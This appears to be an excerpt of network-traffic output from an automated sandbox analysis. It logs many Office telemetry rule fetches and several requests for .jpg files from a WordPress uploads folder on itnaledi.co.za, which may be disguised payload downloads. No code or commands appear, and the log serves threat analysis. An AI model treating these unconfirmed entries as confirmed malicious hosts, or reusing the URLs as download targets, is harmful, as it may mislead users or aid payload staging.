          Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2018/03/DIMENSION.jpg HTTP/1.1Host: www.itnaledi.co.zaConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /rules/rule700751v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule700750v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule700151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2018/03/BYTES.jpg HTTP/1.1Host: www.itnaledi.co.zaConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /rules/rule700150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2018/11/yeastar.jpg HTTP/1.1Host: www.itnaledi.co.zaConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2018/02/cropped-IT-ICON-32x32.png HTTP/1.1Host: www.itnaledi.co.zaConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.itnaledi.co.za/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /rules/rule703451v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule700901v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule703450v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule700900v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule702251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2018/02/cropped-IT-ICON-32x32.png HTTP/1.1Host: www.itnaledi.co.zaConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /rules/rule702250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule702651v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule702650v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule703101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule703100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule702901v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule702900v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule703601v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule703600v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule703851v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule703850v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule703801v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule703800v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule703701v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule703700v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule703751v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule703750v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule701301v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule701300v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule704051v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule704050v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule701701v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule701700v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule702051v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule702050v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule700701v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule700700v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule700551v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule700550v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule703651v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule703650v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule700601v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule700600v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule703151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule703150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule703951v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule703950v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule702851v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule702850v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule700001v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule700000v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule701401v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule701400v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule701951v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule701950v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule700851v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule700850v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule701851v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule701850v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule703051v3s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule703050v3s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule700101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule702100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule702101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule700100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule700951v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule700950v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule703551v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule703550v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule700451v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule702701v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule702700v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule700450v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule701901v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule701900v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule704001v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule704000v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule703251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule703250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule702401v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule702400v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule701551v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule701550v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule700301v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule700300v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule702001v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule702000v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule702601v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule702600v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule703201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule703200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule700250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule700251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule700651v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule700650v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule703301v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule701751v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule703300v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule701750v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule701651v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule701650v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule702451v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule702450v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule701101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule701100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120128v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120607v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120603v8s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule230104v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule230157v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule230158v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
